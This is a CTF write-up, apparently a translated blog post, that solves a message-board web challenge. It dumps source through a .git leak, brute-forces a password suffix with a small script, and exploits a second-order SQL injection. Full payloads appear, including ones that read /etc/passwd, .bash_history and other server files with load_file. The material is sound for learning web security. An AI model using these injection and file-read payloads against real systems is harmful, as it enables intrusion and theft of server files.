- Going in, it's a message board page. You need to log in to post; not logged in, you get sent back to the login page.
- Regardless, first scan it with dirsearch to see what files are there.
- Woohoo! Accidentally found a .git leak!! The scan also turned up mysql.php??? Visiting it seems useless; I'll come back to it later.
- GitHack downloaded it, and only write_do.php came down.
- The code posted:
    <?php
    include "mysql.php";
    session_start();
    // only logged-in sessions may reach the write/comment handlers
    if($_SESSION['login'] != 'yes'){
        header("Location: ./login.php");
        die();
    }
    if(isset($_GET['do'])){
        switch ($_GET['do'])
        {
            case 'write':
                break;
            case 'comment':
                break;
            default:
                header("Location: ./index.php");
        }
    }
    else{
        header("Location: ./index.php");
    }
    ?>
- So session must equal yes.
- There's a trick here: jumping to login.php gives a small hint.
- Account: zhangwei Password: zhangwei***
- Here you can try brute-forcing to get the correct account and password! Awesome!
- Write a script to list all three-character combinations of digits and letters:
    # every 3-character combination over the digits and letters, one per line
    str_a = '123456789abcdefghijklmnopqrstuvwxyz'
    for i in str_a:
        for j in str_a:
            for k in str_a:
                print(i + j + k)
- The password turned out to be zhangwei666.
- After logging in successfully, the SQL injection from the title should be on this page. My blind guess is a second-order injection.
- Post something first, then read the value back.
- Fuck, I couldn't figure out whether it's a second-order injection or not, so I looked at the writeup.
- I found that my GitHack download of do_login.php was incomplete, so here is the full source from the master's writeup:
    <?php
    include "mysql.php";
    session_start();
    if($_SESSION['login'] != 'yes'){
        header("Location: ./login.php");
        die();
    }
    if(isset($_GET['do'])){
        switch ($_GET['do'])
        {
            case 'write':
                // user input is escaped with addslashes() and interpolated into the INSERT
                $category = addslashes($_POST['category']);
                $title = addslashes($_POST['title']);
                $content = addslashes($_POST['content']);
                $sql = "insert into board
                        set category = '$category',
                            title = '$title',
                            content = '$content'";
                $result = mysql_query($sql);
                header("Location: ./index.php");
                break;
            case 'comment':
                $bo_id = addslashes($_POST['bo_id']);
                $sql = "select category from board where id='$bo_id'";
                $result = mysql_query($sql);
                $num = mysql_num_rows($result);
                if($num>0){
                    // category is read back from the database and interpolated raw
                    $category = mysql_fetch_array($result)['category'];
                    $content = addslashes($_POST['content']);
                    $sql = "insert into comment
                            set category = '$category',
                                content = '$content',
                                bo_id = '$bo_id'";
                    $result = mysql_query($sql);
                }
                header("Location: ./comment.php?id=$bo_id");
                break;
            default:
                header("Location: ./index.php");
        }
    }
    else{
        header("Location: ./index.php");
    }
    ?>
————————————————
// Copyright notice: this article is an original work by CSDN blogger 「HyyMbb」, licensed under CC 4.0 BY-SA; please include the original source link and this notice when reposting.
// Original link: https://blog.csdn.net/a3320315/article/details/104216070
- The key point of this challenge is category: the injection statement goes into the category field of write, and when a comment is submitted the category is taken straight out of the database and reused without any filtering.
- And category was processed with addslashes($_POST['category']) when it was written, so we have to put some thought in here.
- And the trickiest point of this challenge is
    $content = addslashes($_POST['content']);
    $sql = "insert into comment
            set category = '$category',
                content = '$content',
                bo_id = '$bo_id'";
- Because the insert is split across several lines, adding # after the injection is useless; use /**/ instead.
- For example, when we posted
    TITLE: database
    CATEGORY: 123',content=database(),/*
    CONTENT: 123
  and in the comment submission box wrote
    */#
- At this point the code becomes
    $content = addslashes($_POST['content']);
    $sql = "insert into comment
            set category = '123',content=database(),/*',
                content = '*/#',
                bo_id = '$bo_id'";
- The page returned is
- Then I tried again:
    123',content=(select group_concat(table_name) from information_schema.tables where table_schema=database()),/*
- What came back was
    board,comment,user
- I checked all the tables and failed to find the flag...
- So I started looking at files again:
    123',content=(select (load_file('/etc/passwd'))),/*
    insert into comment
    set category = '123',content=(select (load_file('/etc/passwd'))),/*',
        content = '*/#',
        bo_id = '$bo_id'";
- Returned value
    123',content=(select (load_file('/home/www/.bash_history'))),/*
    123', content=(select hex(load_file('/tmp/html/.DS_Store'))),/*
- After decoding:
    flag_8946e1ff1ee3e40f.php
    123',content=(select (load_file('/var/www/html/flag_8946e1ff1ee3e40f.php'))),/*
- The flag is in F12 (the page source)!!!
- A whole afternoon of manual injection!!!